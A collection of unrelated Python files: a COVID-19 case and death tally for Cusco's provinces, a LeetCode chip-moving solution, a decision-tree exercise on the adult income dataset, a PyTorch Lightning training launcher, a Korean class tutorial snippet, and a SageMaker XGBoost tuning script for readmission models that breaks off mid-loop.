fallecidos_hombres_cusco_quispicanchi = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "QUISPICANCHI") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_quispicanchi = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "QUISPICANCHI") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Paucartambo - Etapa de vida
fallecidos_preinfancia_cusco_quispicanchi = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "QUISPICANCHI") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_quispicanchi = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "QUISPICANCHI") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_quispicanchi = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "QUISPICANCHI") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_quispicanchi = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "QUISPICANCHI") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_quispicanchi = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "QUISPICANCHI") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_quispicanchi = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "QUISPICANCHI") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
#!Cusco-Urubamba
poblacion_cusco_urubamba = 67344
positivos_cusco_urubamba = list(casos_positivos[casos_positivos['PROVINCIA'] == "URUBAMBA"].shape)[0]
positivos_hombres_cusco_urubamba = list(casos_positivos[(casos_positivos['PROVINCIA'] == "URUBAMBA") & (casos_positivos['SEXO'] == "MASCULINO")].shape)[0]
positivos_mujeres_cusco_urubamba = list(casos_positivos[(casos_positivos['PROVINCIA'] == "URUBAMBA") & (casos_positivos['SEXO'] == "FEMENINO")].shape)[0]
fallecidos_cusco_urubamba = list(casos_fallecidos[casos_fallecidos['PROVINCIA'] == "URUBAMBA"].shape)[0]
fallecidos_hombres_cusco_urubamba = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "URUBAMBA") &(casos_fallecidos['SEXO'] == "MASCULINO")].shape)[0]
fallecidos_mujeres_cusco_urubamba = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "URUBAMBA") &(casos_fallecidos['SEXO'] == "FEMENINO")].shape)[0]
#!Provincia Urubamba - Etapa de vida
fallecidos_preinfancia_cusco_urubamba = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "URUBAMBA") & (casos_fallecidos['EDAD_DECLARADA'] >= 0) & (
casos_fallecidos['EDAD_DECLARADA'] <= 5)].shape)[0]
fallecidos_infancia_cusco_urubamba = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "URUBAMBA") & (casos_fallecidos['EDAD_DECLARADA'] >= 6) & (
casos_fallecidos['EDAD_DECLARADA'] <= 11)].shape)[0]
fallecidos_adolescencia_cusco_urubamba = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "URUBAMBA") & (casos_fallecidos['EDAD_DECLARADA'] >= 12) & (
casos_fallecidos['EDAD_DECLARADA'] <= 18)].shape)[0]
fallecidos_juventud_cusco_urubamba = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "URUBAMBA") & (casos_fallecidos['EDAD_DECLARADA'] >= 19) & (
casos_fallecidos['EDAD_DECLARADA'] <= 26)].shape)[0]
fallecidos_adultez_cusco_urubamba = list(casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "URUBAMBA") & (casos_fallecidos['EDAD_DECLARADA'] >= 27) & (
casos_fallecidos['EDAD_DECLARADA'] <= 59)].shape)[0]
fallecidos_persona_mayor_cusco_urubamba = list(
casos_fallecidos[(casos_fallecidos['PROVINCIA'] == "URUBAMBA") & (casos_fallecidos['EDAD_DECLARADA'] >= 60)].shape)[0]
cusco = {
"name": "Cusco",
"poblacion": poblacion_cusco,
"positivos": positivos_cusco,
"hombres_infectados": positivos_hombres_cusco,
"mujeres_infectados": positivos_mujeres_cusco,
"fallecidos": fallecidos_cusco,
"hombres_fallecidos": fallecidos_hombres_cusco,
"mujeres_fallecidos": fallecidos_mujeres_cusco,
"type": "Departamento",
"etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco,
"infancia": fallecidos_infancia_cusco,
"adolescencia": fallecidos_adolescencia_cusco,
"juventud": fallecidos_juventud_cusco,
"adultez": fallecidos_adultez_cusco,
"persona_mayor": fallecidos_persona_mayor_cusco
},
"url": "cusco",
"provincias": [
{"name": "Cusco", "positivos": positivos_cusco_cusco,"poblacion": poblacion_cusco_cusco , "hombres_infectados": positivos_hombres_cusco_cusco,"mujeres_infectados": positivos_mujeres_cusco_cusco, "fallecidos": fallecidos_cusco_cusco, "hombres_fallecidos": fallecidos_hombres_cusco_cusco, "mujeres_fallecidos": fallecidos_mujeres_cusco_cusco, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_cusco,
"infancia": fallecidos_infancia_cusco_cusco,
"adolescencia": fallecidos_adolescencia_cusco_cusco,
"juventud": fallecidos_juventud_cusco_cusco,
"adultez": fallecidos_adultez_cusco_cusco,
"persona_mayor": fallecidos_persona_mayor_cusco_cusco
}},
{"name": "Acomayo", "positivos": positivos_cusco_acomayo,"poblacion": poblacion_cusco_acomayo , "hombres_infectados": positivos_hombres_cusco_acomayo,"mujeres_infectados": positivos_mujeres_cusco_acomayo, "fallecidos": fallecidos_cusco_acomayo, "hombres_fallecidos": fallecidos_hombres_cusco_acomayo, "mujeres_fallecidos": fallecidos_mujeres_cusco_acomayo, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_acomayo,
"infancia": fallecidos_infancia_cusco_acomayo,
"adolescencia": fallecidos_adolescencia_cusco_acomayo,
"juventud": fallecidos_juventud_cusco_acomayo,
"adultez": fallecidos_adultez_cusco_acomayo,
"persona_mayor": fallecidos_persona_mayor_cusco_acomayo
}},
{"name": "Anta", "positivos": positivos_cusco_anta,"poblacion": poblacion_cusco_anta , "hombres_infectados": positivos_hombres_cusco_anta,"mujeres_infectados": positivos_mujeres_cusco_anta, "fallecidos": fallecidos_cusco_anta, "hombres_fallecidos": fallecidos_hombres_cusco_anta, "mujeres_fallecidos": fallecidos_mujeres_cusco_anta, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_anta,
"infancia": fallecidos_infancia_cusco_anta,
"adolescencia": fallecidos_adolescencia_cusco_anta,
"juventud": fallecidos_juventud_cusco_anta,
"adultez": fallecidos_adultez_cusco_anta,
"persona_mayor": fallecidos_persona_mayor_cusco_anta
}},
{"name": "Calca", "positivos": positivos_cusco_calca,"poblacion": poblacion_cusco_calca , "hombres_infectados": positivos_hombres_cusco_calca,"mujeres_infectados": positivos_mujeres_cusco_calca, "fallecidos": fallecidos_cusco_calca, "hombres_fallecidos": fallecidos_hombres_cusco_calca, "mujeres_fallecidos": fallecidos_mujeres_cusco_calca, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_calca,
"infancia": fallecidos_infancia_cusco_calca,
"adolescencia": fallecidos_adolescencia_cusco_calca,
"juventud": fallecidos_juventud_cusco_calca,
"adultez": fallecidos_adultez_cusco_calca,
"persona_mayor": fallecidos_persona_mayor_cusco_calca
}},
{"name": "Canas", "positivos": positivos_cusco_canas,"poblacion": poblacion_cusco_canas , "hombres_infectados": positivos_hombres_cusco_canas,"mujeres_infectados": positivos_mujeres_cusco_canas, "fallecidos": fallecidos_cusco_canas, "hombres_fallecidos": fallecidos_hombres_cusco_canas, "mujeres_fallecidos": fallecidos_mujeres_cusco_canas, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_canas,
"infancia": fallecidos_infancia_cusco_canas,
"adolescencia": fallecidos_adolescencia_cusco_canas,
"juventud": fallecidos_juventud_cusco_canas,
"adultez": fallecidos_adultez_cusco_canas,
"persona_mayor": fallecidos_persona_mayor_cusco_canas
}},
{"name": "Canchis", "positivos": positivos_cusco_canchis,"poblacion": poblacion_cusco_canchis , "hombres_infectados": positivos_hombres_cusco_canchis,"mujeres_infectados": positivos_mujeres_cusco_canchis, "fallecidos": fallecidos_cusco_canchis, "hombres_fallecidos": fallecidos_hombres_cusco_canchis, "mujeres_fallecidos": fallecidos_mujeres_cusco_canchis, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_canchis,
"infancia": fallecidos_infancia_cusco_canchis,
"adolescencia": fallecidos_adolescencia_cusco_canchis,
"juventud": fallecidos_juventud_cusco_canchis,
"adultez": fallecidos_adultez_cusco_canchis,
"persona_mayor": fallecidos_persona_mayor_cusco_canchis
}},
{"name": "Chumbivilcas", "positivos": positivos_cusco_chumbivilcas,"poblacion": poblacion_cusco_chumbivilcas , "hombres_infectados": positivos_hombres_cusco_chumbivilcas,"mujeres_infectados": positivos_mujeres_cusco_chumbivilcas, "fallecidos": fallecidos_cusco_chumbivilcas, "hombres_fallecidos": fallecidos_hombres_cusco_chumbivilcas, "mujeres_fallecidos": fallecidos_mujeres_cusco_chumbivilcas, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_chumbivilcas,
"infancia": fallecidos_infancia_cusco_chumbivilcas,
"adolescencia": fallecidos_adolescencia_cusco_chumbivilcas,
"juventud": fallecidos_juventud_cusco_chumbivilcas,
"adultez": fallecidos_adultez_cusco_chumbivilcas,
"persona_mayor": fallecidos_persona_mayor_cusco_chumbivilcas
}},
{"name": "Espinar", "positivos": positivos_cusco_espinar,"poblacion": poblacion_cusco_espinar , "hombres_infectados": positivos_hombres_cusco_espinar,"mujeres_infectados": positivos_mujeres_cusco_espinar, "fallecidos": fallecidos_cusco_espinar, "hombres_fallecidos": fallecidos_hombres_cusco_espinar, "mujeres_fallecidos": fallecidos_mujeres_cusco_espinar, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_espinar,
"infancia": fallecidos_infancia_cusco_espinar,
"adolescencia": fallecidos_adolescencia_cusco_espinar,
"juventud": fallecidos_juventud_cusco_espinar,
"adultez": fallecidos_adultez_cusco_espinar,
"persona_mayor": fallecidos_persona_mayor_cusco_espinar
}},
{"name": "La Convencion", "positivos": positivos_cusco_convencion,"poblacion": poblacion_cusco_convencion , "hombres_infectados": positivos_hombres_cusco_convencion,"mujeres_infectados": positivos_mujeres_cusco_convencion, "fallecidos": fallecidos_cusco_convencion, "hombres_fallecidos": fallecidos_hombres_cusco_convencion, "mujeres_fallecidos": fallecidos_mujeres_cusco_convencion, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_convencion,
"infancia": fallecidos_infancia_cusco_convencion,
"adolescencia": fallecidos_adolescencia_cusco_convencion,
"juventud": fallecidos_juventud_cusco_convencion,
"adultez": fallecidos_adultez_cusco_convencion,
"persona_mayor": fallecidos_persona_mayor_cusco_convencion
}},
{"name": "Paruro", "positivos": positivos_cusco_paruro,"poblacion": poblacion_cusco_paruro , "hombres_infectados": positivos_hombres_cusco_paruro,"mujeres_infectados": positivos_mujeres_cusco_paruro, "fallecidos": fallecidos_cusco_paruro, "hombres_fallecidos": fallecidos_hombres_cusco_paruro, "mujeres_fallecidos": fallecidos_mujeres_cusco_paruro, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_paruro,
"infancia": fallecidos_infancia_cusco_paruro,
"adolescencia": fallecidos_adolescencia_cusco_paruro,
"juventud": fallecidos_juventud_cusco_paruro,
"adultez": fallecidos_adultez_cusco_paruro,
"persona_mayor": fallecidos_persona_mayor_cusco_paruro
}},
{"name": "Paucartambo", "positivos": positivos_cusco_paucartambo,"poblacion": poblacion_cusco_paucartambo , "hombres_infectados": positivos_hombres_cusco_paucartambo,"mujeres_infectados": positivos_mujeres_cusco_paucartambo, "fallecidos": fallecidos_cusco_paucartambo, "hombres_fallecidos": fallecidos_hombres_cusco_paucartambo, "mujeres_fallecidos": fallecidos_mujeres_cusco_paucartambo, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_paucartambo,
"infancia": fallecidos_infancia_cusco_paucartambo,
"adolescencia": fallecidos_adolescencia_cusco_paucartambo,
"juventud": fallecidos_juventud_cusco_paucartambo,
"adultez": fallecidos_adultez_cusco_paucartambo,
"persona_mayor": fallecidos_persona_mayor_cusco_paucartambo
}},
{"name": "Quispicanchi", "positivos": positivos_cusco_quispicanchi,"poblacion": poblacion_cusco_quispicanchi , "hombres_infectados": positivos_hombres_cusco_quispicanchi,"mujeres_infectados": positivos_mujeres_cusco_quispicanchi, "fallecidos": fallecidos_cusco_quispicanchi, "hombres_fallecidos": fallecidos_hombres_cusco_quispicanchi, "mujeres_fallecidos": fallecidos_mujeres_cusco_quispicanchi, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_quispicanchi,
"infancia": fallecidos_infancia_cusco_quispicanchi,
"adolescencia": fallecidos_adolescencia_cusco_quispicanchi,
"juventud": fallecidos_juventud_cusco_quispicanchi,
"adultez": fallecidos_adultez_cusco_quispicanchi,
"persona_mayor": fallecidos_persona_mayor_cusco_quispicanchi
}},
{"name": "Urubamba", "positivos": positivos_cusco_urubamba,"poblacion": poblacion_cusco_urubamba , "hombres_infectados": positivos_hombres_cusco_urubamba,"mujeres_infectados": positivos_mujeres_cusco_urubamba, "fallecidos": fallecidos_cusco_urubamba, "hombres_fallecidos": fallecidos_hombres_cusco_urubamba, "mujeres_fallecidos": fallecidos_mujeres_cusco_urubamba, "type": "Provincia", "etapa_de_vida_fallecidos": {
"primera_infancia": fallecidos_preinfancia_cusco_urubamba,
"infancia": fallecidos_infancia_cusco_urubamba,
"adolescencia": fallecidos_adolescencia_cusco_urubamba,
"juventud": fallecidos_juventud_cusco_urubamba,
"adultez": fallecidos_adultez_cusco_urubamba,
"persona_mayor": fallecidos_persona_mayor_cusco_urubamba
}}
]
}
print(json.dumps(cusco));
sys.stdout.flush(); |
"""
数轴上放置了一些筹码,每个筹码的位置存在数组 chips 当中。
你可以对 任何筹码 执行下面两种操作之一(不限操作次数,0 次也可以):
将第 i 个筹码向左或者右移动 2 个单位,代价为 0。
将第 i 个筹码向左或者右移动 1 个单位,代价为 1。
最开始的时候,同一位置上也可能放着两个或者更多的筹码。
返回将所有筹码移动到同一位置(任意位置)上所需要的最小代价。
示例 1:
输入:chips = [1,2,3]
输出:1
解释:第二个筹码移动到位置三的代价是 1,第一个筹码移动到位置三的代价是 0,总代价为 1。
示例 2:
输入:chips = [2,2,2,3,3]
输出:2
解释:第四和第五个筹码移动到位置二的代价都是 1,所以最小总代价为 2。
提示:
1 <= chips.length <= 100
1 <= chips[i] <= 10^9
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/play-with-chips
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
class Solution:
def minCostToMoveChips(self, chips: List[int]) -> int:
count_odd = count_even = 0
for chip in chips:
if chip % 2 == 0:
count_even += 1
else:
count_odd += 1
return min(count_even, count_odd)
|
# -*- coding: utf-8 -*-
import pandas as pd
from sklearn import tree
import matplotlib.pyplot as plt
import re
col_names = [] #contiene i nomi delle colonne
#leggo i nomi delle colonne dal file adult.names
with open("adult.names",'r') as f:
for line in f:
line = line.strip()
if len(line) == 0 or line[0] == '|':
continue
p = line.find(':')
if p < 0:
continue
col_names.append(line[:p])
col_names.append("income")
#print(col_names)
#leggo il dataset di training
training = pd.read_csv("adult.data", names = col_names, skipinitialspace = True)
X_t = pd.get_dummies(training[training.columns[:-1]]) #tutte le colonne tranne l'ultima. Get dummies esplode le colonne non numeriche in N colonne di 0 e 1
y_t = training[training.columns[-1]] #ultima colonna
#leggo il dataset di validazione
validation = pd.read_csv("adult.test", names = col_names, skipinitialspace = True, skiprows = 1)
X_v = pd.get_dummies(validation[validation.columns[:-1]]).reindex(columns = X_t.columns, fill_value = 0)
y_v = validation[validation.columns[-1]]
translation = {v:v[:-1] for v in y_v.unique()} #alcune righe del dataset hanno un punto finale. Lo tolgo
y_v = y_v.replace(translation)
#creo e alleno l'albero di decisione, provando diverse profondità dell'albero: da 1 a 30
depths = range(1,30)
accuracies = []
for depth in depths:
classifier = tree.DecisionTreeClassifier(max_depth = depth)
classifier.fit(X_t,y_t)
#creo un file che descrive l'albero di decisione
description = tree.export_graphviz(classifier, out_file = None)
description = re.sub(r'X\[([0-9]+)\]', lambda match: X_t.columns[int(match.group(1))], description)
with open("adult" + str(depth) + ".dot",'w') as f:
f.write(description)
y_p = classifier.predict(X_v)
accuracy = sum(y_p == y_v) / float(len(y_v)) #accuratezza del modello
accuracies.append(accuracy)
print depth, accuracy
#disegno un grafico con le accuratezze in base alla profondità
plt.plot(depths, accuracies)
plt.show()
#più l'albero è profondo, più cresce il problema di overfitting: l'albero impara tutte le anomalie del dataset di training!
|
#!/scratch_net/neo/aabhinav/anaconda3/bin/python -u
import os
import shutil
import sys
import torch
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.logging import TestTubeLogger
sys.path.append('/scratch_net/neo_second/aabhinav/dlad_project/project_02/')
# sys.path.append('/Users/abhinavaggarwal/Downloads/dlad_project/project_02/')
from mtl.experiments.experiment_semseg_with_depth import ExperimentSemsegDepth
from mtl.utils.rules import check_all_rules, pack_submission
from mtl.utils.config import command_line_parser
from mtl.utils.daemon_tensorboard import DaemonTensorboard
from mtl.utils.daemon_ngrok import DaemonNgrok
from mtl.utils.helpers import create_experiment_name, save_config
def main():
cfg = command_line_parser()
cfg = create_experiment_name(cfg)
check_all_rules(cfg)
model = ExperimentSemsegDepth(cfg)
logger = TestTubeLogger(
save_dir=os.path.join(cfg.log_dir),
name='tube',
version=0,
)
save_config(cfg)
checkpoint_callback = ModelCheckpoint(
filepath=os.path.join(cfg.log_dir, 'checkpoints'),
save_best_only=True,
verbose=True,
monitor='metric',
mode='max',
prefix=''
)
trainer = Trainer(
logger=logger,
checkpoint_callback=checkpoint_callback,
gpus='-1' if torch.cuda.is_available() else None,
show_progress_bar=cfg.log_to_console,
max_nb_epochs=cfg.num_epochs,
distributed_backend=None,
print_nan_grads=False,
weights_summary=None,
weights_save_path=None,
nb_sanity_val_steps=1,
)
daemon_tb = None
daemon_ngrok = None
if not cfg.prepare_submission:
if cfg.tensorboard_daemon_start:
daemon_tb = DaemonTensorboard(cfg.log_dir, cfg.tensorboard_daemon_port)
daemon_tb.start()
if cfg.ngrok_daemon_start:
daemon_ngrok = DaemonNgrok(cfg.ngrok_auth_token, cfg.tensorboard_daemon_port)
daemon_ngrok.start()
trainer.fit(model)
# prepare submission archive with predictions, source code, training log, and the model
dir_pred = os.path.join(cfg.log_dir, 'predictions')
shutil.rmtree(dir_pred, ignore_errors=True)
trainer.test(model)
pack_submission(cfg.log_dir)
if daemon_tb is not None:
daemon_tb.stop()
if daemon_ngrok is not None:
daemon_ngrok.stop()
if __name__ == '__main__':
main()
|
#-*-coding: utf-8 -*-#
class Service:
secret="영구는 배꼽이 두 개다." #클래스가 가지는 고유의 공통속성
name=""
def __init__(self, name): #언더스코어 두개의 의미는 이 함수가 원래 파이썬에 있는 함수란 것을 의미한다
self.name= name
def sum(self, a, b):
result = a+b
print("%s님 %s+%s=%s입니다." % (self.name, a,b,result))
def get_secret(self):
return self.secret
pey= Service("홍길동") #객체만이 가지는 고유의 초기값을 설정하고 싶을 때 생성자를 활용한다.
print(pey.get_secret())
|
"""
A module that trains readmissions xgboost models.
"""
import json
import os
import sys
import time
import numpy as np
import pandas as pd
import shutil
from time import gmtime, strftime
import sagemaker
import boto3
from sagemaker.tuner import (
IntegerParameter,
CategoricalParameter,
ContinuousParameter,
HyperparameterTuner,
)
# import shap
import tarfile
import pickle
pd.options.mode.chained_assignment = None
from sagemaker.image_uris import retrieve
from pprint import pprint
import xgboost as xgb
def load_class_imbalances(class_imbalances_path):
"""
Load class imbalances from json file.
Args:
class_imbalances_path(str): Class imbalances path
"""
with open(class_imbalances_path, "r") as fp:
class_imbalances = json.load(fp)
return class_imbalances
def get_best_model_path(tuning_job_result):
"""Gets model path in the S3 from the tuning job outputs
Args:
tuning_job_result(object): Hyperparameter tuning result
Returns:
str: Best model path from the tuning jobs
"""
best_job = tuning_job_result.get("BestTrainingJob", None)
job_name = best_job["TrainingJobName"]
model_name = job_name + "-model"
info = smclient.describe_training_job(TrainingJobName=job_name)
model_path = info["ModelArtifacts"]["S3ModelArtifacts"]
return model_path
def get_tuner_status_and_result_until_completion(
tuner, num_features, target, sleep_time=60
):
"""Print results of running tuner on a regular interval until completion
Args:
tuner(Object): The running Hyperparameter tuner object
target(str): Target string
Returns:
None
"""
while True:
tuning_job_result = smclient.describe_hyper_parameter_tuning_job(
HyperParameterTuningJobName=tuner.latest_tuning_job.job_name
)
job_count = tuning_job_result["TrainingJobStatusCounters"]["Completed"]
status = tuning_job_result["HyperParameterTuningJobStatus"]
auc_value = None
if tuning_job_result.get("BestTrainingJob", None):
best_job = tuning_job_result["BestTrainingJob"]
metric = best_job["FinalHyperParameterTuningJobObjectiveMetric"][
"MetricName"
]
auc_value = best_job["FinalHyperParameterTuningJobObjectiveMetric"]["Value"]
auc_value = round(auc_value, 4)
print("Total jobs completed: {}".format(job_count))
print("Metric: {}".format(metric))
print("Best AUC: {}".format(auc_value))
else:
print("-")
if status == "Completed":
model_path = get_best_model_path(tuning_job_result)
return auc_value, model_path
time.sleep(sleep_time)
def train_hpo(
hyperparameter_ranges,
container,
execution_role,
instance_count,
instance_type,
output_path,
sagemaker_session,
eval_metric,
objective,
objective_metric_name,
max_train_jobs,
max_parallel_jobs,
scale_pos_weight,
data_channels,
):
"""
Train a model based on a given data fold and HPO training job summary job.
Args:
hyperparameter_ranges(dict): Dictionary of all hyperparameter ranges
container(Object): Xgboost model docker container
execution_role(Object): Role to enable execution of HPO job
instance_count(int): # of instances for training job
instance_type(str): Instance type
output_path(str): Output path
sagemaker_session(Object): SageMaker session
eval_metric(str): Evaluation metric
objective(str): Objective function name
objective_metric_name(str): Objective function metric name
max_train_jobs(int): Max number of training jobs to run
max_parallel_jobs(int): Max number of jobs to run in parallel
scale_pos_weight: Class imbalance weight scale
data_channels(dict): Dictionary of data channels to be used for training
Returns:
Tuner object
"""
xgb_model = sagemaker.estimator.Estimator(
container,
execution_role,
instance_count=instance_count,
instance_type=instance_type,
output_path=output_path,
sagemaker_session=sagemaker_session,
)
xgb_model.set_hyperparameters(
eval_metric=eval_metric,
objective=objective,
scale_pos_weight=scale_pos_weight, # For class imbalance
num_round=200,
rate_drop=0.3,
max_depth=5,
subsample=0.8,
gamma=2,
eta=0.2,
)
tuner = HyperparameterTuner(
xgb_model,
objective_metric_name,
hyperparameter_ranges,
max_jobs=max_train_jobs,
max_parallel_jobs=max_parallel_jobs,
)
tuner.fit(inputs=data_channels)
return tuner
def get_best_hpo_jobs(hpo_path_pattern, folds, data_all):
"""
Get best training job for each fold.
Args:
hpo_path_pattern(str): HPO path pattern where the HPO results are located
folds(list): List of folds
data_all(str): Data all folder name
Returns:
Tuple of best hpos and output file path
"""
output_path = hpo_path_pattern.format(data_all)
if os.path.exists(output_path):
print(
"Best training jobs file for each fold already created! Loading existing data..."
)
df = pd.read_csv(output_path)
return df, output_path
df = None
columns = None
best_params = []
hpo_fname = ""
for fold in folds:
hpo_path = hpo_path_pattern.format(fold)
df_hpo = pd.read_csv(hpo_path)
if columns is None:
columns = df_hpo.columns.tolist()
columns.append("fold")
hpo_fname = os.path.basename(hpo_path)
val_aucs = df_hpo["FinalObjectiveValue"].tolist()
max_auc = max(val_aucs)
max_idx = val_aucs.index(max_auc)
hpo_best_params = df_hpo.iloc[max_idx, :].tolist()
hpo_best_params.append(fold)
best_params.append(hpo_best_params)
df = pd.DataFrame(best_params, columns=columns)
output_dir = os.path.dirname(output_path)
os.makedirs(output_dir, exist_ok=True)
df.to_csv(output_path, index=False)
return df, output_path
def get_best_params(df_hpo, criteria="avg"):
"""
Get the parameters of the best hpo based on the given criteria.
criteria possible values: ['min', 'max', 'avg']
Args:
df_hpo(DataFrame): HPO results in dataframe format
criteria(str): Selection criter for the best params (avg/min/max)
Returns:
Tuple of best params and best AUC
"""
auc_col = "FinalObjectiveValue"
val_aucs = df_hpo[auc_col].tolist()
auc = None
if criteria == "min":
auc = min(val_aucs)
idx = val_aucs.index(auc)
elif criteria == "max":
auc = max(val_aucs)
idx = val_aucs.index(auc)
elif criteria == "avg":
df_hpo.sort_values(auc_col, inplace=True)
idx = 2
auc = df_hpo[auc_col][idx]
else:
raise ValueError("Error! Invalid criteria: {}".format(criteria))
params = dict(df_hpo.iloc[idx, :12])
int_params = ["max_delta_step", "max_depth", "num_round"]
for param in int_params:
params[param] = int(params[param])
return params, auc
def train_model(
params,
container,
execution_role,
instance_count,
instance_type,
output_path,
sagemaker_session,
eval_metric,
objective,
scale_pos_weight,
data_channels,
):
"""
Train a model based on a given data and xgboost params.
Args:
params(dict): Dictionary of params
container(Object): Xgboost model docker container
execution_role(Object): Rule that enables execution of a training job
instance_count(int): # of instances for training job
instance_type(str): Instance type
output_path(str): Output path
sagemaker_session(Object): SageMaker session
eval_metric(str): Evaluation metric
objective(str): Objective function name
objective_metric_name(str): Objective function metric name
max_train_jobs(int): Max number of training jobs to run
max_parallel_jobs(int): Max number of jobs to run in parallel
scale_pos_weight: Class imbalance weight scale
data_channels(dict): Dictionary of data channels to be used for training
Returns:
Output model s3 path
"""
xgb_model = sagemaker.estimator.Estimator(
container,
execution_role,
instance_count=instance_count,
instance_type=instance_type,
output_path=output_path,
sagemaker_session=sagemaker_session,
)
xgb_model.set_hyperparameters(
eval_metric=eval_metric,
objective=objective,
scale_pos_weight=scale_pos_weight, # For class imbalance
**params
)
xgb_model.fit(inputs=data_channels)
job_name = xgb_model._current_job_name
s3_model_path = os.path.join(output_path, job_name, "output/model.tar.gz")
return s3_model_path
if __name__ == "__main__":
# Number of features used for training
NUM_FEATURES = 200
FOLDS = ["fold_" + str(i) for i in range(5)]
DATA_ALL = "all"
BEST_JOB_CRITERIA = (
"avg" # Criteria to select the best training job for final training
)
# FOLDS.append(DATA_ALL)
LABEL = "unplanned_readmission"
ROOT_DIR = "/home/ec2-user/SageMaker/CMSAI/modeling/tes/data/final-global/re/1000/"
DATA_DIR = os.path.join(ROOT_DIR, "preprocessed")
TRAIN_DIR = os.path.join(ROOT_DIR, "training")
CLASS_IMBALANCE_PATH_PATTERN = os.path.join(DATA_DIR, "{}", "class_imbalances.json")
HPO_SUMMARY_PATH_PATTERN = os.path.join(
TRAIN_DIR, str(NUM_FEATURES), "{}", "hpo_results.csv"
)
TRAIN_RESULTS_PATH_PATTERN = os.path.join(
TRAIN_DIR, str(NUM_FEATURES), "{}", "train_results.csv"
)
# Bucket where the trained model is stored
BUCKET = "cmsai-mrk-amzn"
# Directory prefix where the model training outputs is saved
now = strftime("%Y-%m-%d-%H-%M-%S", gmtime())
DATA_PREFIX = (
"FinalData/RE/Models/XGBoost/1000/training/data" # data_split, num_features
)
MODEL_PREFIX = "FinalData/RE/Models/XGBoost/1000/training/models" # data_split, num_features, time
###Algorithm config
ALGORITHM = "xgboost"
REPO_VERSION = "1.2-1"
###HPO/training job config
TRAIN_INSTANCE_TYPE = "ml.m4.16xlarge"
TRAIN_INSTANCE_COUNT = 2
MAX_PARALLEL_JOBS = 4
MAX_TRAIN_JOBS = 20
EVALUATION_METRIC = "auc"
OBJECTIVE = "binary:logistic"
OBJECTIVE_METRIC_NAME = "validation:auc"
# Update hyperparameter ranges
# HYPERPARAMETER_RANGES = {'eta': ContinuousParameter(0, 1),
# 'alpha': ContinuousParameter(0, 2),
# 'max_depth': IntegerParameter(1, 10)}
HYPERPARAMETER_RANGES = {
"eta": ContinuousParameter(0.1, 0.5),
"alpha": ContinuousParameter(0, 2),
"max_depth": IntegerParameter(1, 10),
"gamma": ContinuousParameter(0, 5),
"num_round": IntegerParameter(200, 500),
"colsample_bylevel": ContinuousParameter(0.1, 1.0),
"colsample_bynode": ContinuousParameter(0.1, 1.0),
"colsample_bytree": ContinuousParameter(0.5, 1.0),
"lambda": ContinuousParameter(0, 1000),
"max_delta_step": IntegerParameter(0, 10),
"min_child_weight": ContinuousParameter(0, 120),
"subsample": ContinuousParameter(0.5, 1.0),
}
### SageMaker Initialization
region = boto3.Session().region_name
role = sagemaker.get_execution_role()
smclient = boto3.Session().client("sagemaker")
sess = sagemaker.Session()
container = retrieve(ALGORITHM, region, version=REPO_VERSION)
for fold in FOLDS:
print("Launching HPO tuning job for {}...".format(fold))
# Prepare the input train & validation data path
s3_train_path = "s3://{}/{}/{}/{}/train".format(
BUCKET, DATA_PREFIX, fold, NUM_FEATURES
)
s3_val_path = "s3://{}/{}/{}/{}/val".format(
BUCKET, DATA_PREFIX, fold, NUM_FEATURES
)
